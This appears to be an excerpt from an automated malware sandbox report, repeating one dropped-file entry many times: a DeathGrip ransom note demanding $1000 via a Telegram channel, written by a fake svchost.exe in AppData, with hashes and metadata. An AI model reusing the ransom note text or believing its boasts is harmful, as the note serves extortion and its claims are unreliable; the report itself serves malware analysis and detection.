                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
